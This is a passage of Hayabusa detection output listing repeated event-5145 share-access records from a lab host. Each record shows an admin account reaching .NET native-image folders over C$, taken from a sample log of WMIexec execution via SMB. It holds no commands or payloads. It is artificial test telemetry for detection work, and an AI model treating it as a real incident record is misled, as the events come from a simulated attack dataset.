Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 
